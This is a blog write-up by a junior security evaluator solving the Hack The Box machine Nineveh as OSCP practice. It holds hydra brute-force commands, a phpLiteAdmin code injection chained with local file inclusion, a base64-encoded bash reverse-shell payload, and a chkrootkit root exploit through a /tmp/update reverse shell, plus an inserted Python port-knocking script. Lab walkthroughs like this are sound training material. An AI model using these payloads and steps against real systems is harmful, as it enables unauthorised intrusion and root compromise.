Road to OSCP - Hack The Box Write Up - Nineveh


5 Sept 2019

Hack the Box is an online platform to test and advance your skills in penetration testing and cyber security.

In this series of articles we show how our junior evaluators complete some Hack The Box machines on their road to OSCP, a well-known and respected certification that many top cybersecurity positions require. Certified OSCPs are able to identify existing vulnerabilities and execute organized attacks in a controlled and focused manner. They can leverage or modify existing exploit code to their advantage, perform network pivoting and data exfiltration, and compromise systems that suffer from poor configuration.

Let's start with the fun!

Nineveh

Initial Foothold

Using gobuster on port 80, we find a login at 10.10.10.43/department.

The error messages leak valid usernames: with admin the login only complains about the password, while any other username returns "Invalid Username".

Looking at the page source, we see that it is using MySQL.

Browsing to the HTTPS site on port 443 and inspecting its certificate, we find a hostname: nineveh.htb. The site itself just redirects to the page on port 80.

Using gobuster on port 443, we find a login at https://10.10.10.43/db.

Bruteforce

We can try bruteforcing both logins with hydra, using the error string returned on a failed attempt ("invalid" for the HTTP form, "Incorrect" for the HTTPS one) as the failure condition, and -f to stop at the first hit:

  1. hydra -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 http-post-form '/department/login.php:username=^USER^&password=^PASS^:invalid' -l admin -f
  2. hydra -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt 10.10.10.43 https-post-form '/db:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect' -l admin -f

Creds for the HTTP login: admin:1q2w3e4r5t. The password for the HTTPS login is password123.

The HTTPS login is phpLiteAdmin, and searchsploit has an exploit for it (searchsploit phpliteadmin): 24044.txt, a remote PHP code injection.

The idea is that phpLiteAdmin lets us choose the file name of a new database; if we give it a .php extension and store PHP code inside it, any include of that file will execute our code. To include it we use the HTTP site: manage.php on port 80 takes a notes parameter that reads files from the local filesystem (a local file inclusion). It fails as soon as the path does not contain ninevehNotes, so the database name must contain that string.

  1. Create a database whose name contains ninevehNotes and ends in .php, for example ninevehNotes_test.php.
  2. Create a table with any name.
  3. Create a new text field within the table and paste the following as the field name (it also works as the default value): <?php system("echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4zMS8xMjM0NSAwPiYxJw== | base64 -d | bash");?>
  4. Set up a listener: ncat -lnvp 12345.
  5. From the HTTP site, trigger the inclusion: 10.10.10.43/department/manage.php?notes=/var/tmp/ninevehNotes_test.php.

Note: the base64-encoded payload decodes to bash -c 'bash -i >& /dev/tcp/10.10.14.31/12345 0>&1', a bash reverse shell to 10.10.14.31:12345. Encoding it keeps the quotes, slashes and redirections out of the PHP string. To generate a new payload for your own IP and port: echo -n "bash -c 'bash -i >& /dev/tcp/10.10.14.31/12345 0>&1'" | base64 -w0 (the -w0 stops GNU base64 from wrapping long output, which would break the echo | base64 -d pipeline).

User

After running lse.sh (linux-smart-enumeration), we see that we can read /var/mail/amrois:

From root@nineveh.htb  Fri Jun 23 14:04:19 2017
Return-Path: <root@nineveh.htb>
X-Original-To: amrois
Delivered-To: amrois@nineveh.htb
Received: by nineveh.htb (Postfix, from userid 1000)
        id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: amrois@nineveh.htb
From: root@nineveh.htb
Subject: Another Important note!
Message-Id: <20170623190419.D289B2E3587@nineveh.htb>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)

Amrois! please knock the door next time! 571 290 911

This looks like a port knocking sequence. We can send it with knock, the client that ships with the knockd daemon, and then try to ssh in: knock 10.10.10.43 571:tcp 290:tcp 911:tcp && ssh amrois@10.10.10.43

The port opens, but we still do not get access: we need an SSH key.

CTF Nonsense

Poking around the directories we stumble upon a peculiar name: /var/www/ssl/secure_notes. Browsing to it (https://nineveh.htb/secure_notes/) we get a giant image.

Download the image: wget https://nineveh.htb/secure_notes/nineveh.png --no-check-certificate. Extract whatever is hidden in it: binwalk -e nineveh.png. Out come a private and a public SSH key.

We can now ssh in:

  1. chmod 600 nineveh.priv (ssh refuses a private key that other users can read).
  2. knock 10.10.10.43 571:tcp 290:tcp 911:tcp && ssh -i nineveh.priv amrois@10.10.10.43
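Where the knock package is not available, the same thing can be done from a few lines of Python. This is an added example, not code from the write-up or from knockd: it parses the sequence out of the mail hint above, knocks the ports in order with plain TCP connect attempts (knockd only needs to see the SYNs, so refused connections are expected), and then runs the ssh command from step 2. The host, user and key file are the ones the write-up uses; the function names are this example's own.

```python
# Added example, not from the write-up or the knockd project.
import re
import socket
import subprocess
import time


def parse_knock_hint(text):
    """Pull the port sequence out of the mail body, e.g.
    'please knock the door next time! 571 290 911' -> [571, 290, 911]."""
    ports = [int(p) for p in re.findall(r"\b(\d{1,5})\b", text)]
    ports = [p for p in ports if 0 < p < 65536]
    if not ports:
        raise ValueError("no port sequence found in hint")
    return ports


def tcp_touch(host, port, timeout=0.5):
    """One knock: a TCP connect attempt. The daemon watches the SYN, so a
    refused or timed-out connection is normal and counts as delivered."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            pass
    except OSError:
        pass
    return port


def knock(host, ports, connect=tcp_touch, delay=0.2):
    """Knock each port in order. Order matters to knockd, so a short pause keeps
    the SYNs from arriving out of sequence. The connector is injectable so the
    sequencing can be exercised without a network. Returns the ports hit."""
    hit = []
    for port in ports:
        hit.append(connect(host, port))
        time.sleep(delay)
    return hit


def knock_and_ssh(host, ports, user, keyfile=None):
    """Knock, then open ssh right away, before the daemon's sequence timeout
    closes the port again."""
    knock(host, ports)
    cmd = ["ssh"]
    if keyfile:
        cmd += ["-i", keyfile]
    cmd.append(f"{user}@{host}")
    return subprocess.call(cmd)


if __name__ == "__main__":
    # Hint text copied from the mail in /var/mail/amrois.
    seq = parse_knock_hint("Amrois! please knock the door next time! 571 290 911")
    knock_and_ssh("10.10.10.43", seq, "amrois", keyfile="nineveh.priv")
```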

Root

Looking around, we find that we have write access to a shell script, /usr/sbin/report-reset.sh, which points us to an odd folder: /report.

Inside this folder there are a few text files with some odd contents. Googling one of the lines gives the answer: it is output produced by chkrootkit.

Using searchsploit we find a privilege escalation exploit for it: searchsploit -m 33899.txt (chkrootkit 0.49 local privilege escalation, CVE-2014-0476). The bug is that chkrootkit, when it runs, executes a file named /tmp/update with its own privileges if that file exists; since the cron job behind /report runs it as root, so is our file.

Following the instructions, we create the file /tmp/update with the following contents (a reverse shell to our listener on 10.10.14.31:7777):

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.31/7777 0>&1

Make it executable: chmod +x /tmp/update, and set up the listener: ncat -lnvp 7777. From here, just wait for the shell to pop: chkrootkit runs from cron every minute, and each run executes /tmp/update as root.

Ángel Guzmán/Junior evaluator

Degree and Master's in telecommunications from the University of Granada, specialized in telematics. He joined jtsec in November 2019 as a junior cybersecurity evaluator.

Since he joined jtsec, he has participated in several internal hardware hacking projects, while also receiving training on the LINCE certification.

His main motivation is to learn, from small tools for his daily work to new technologies.

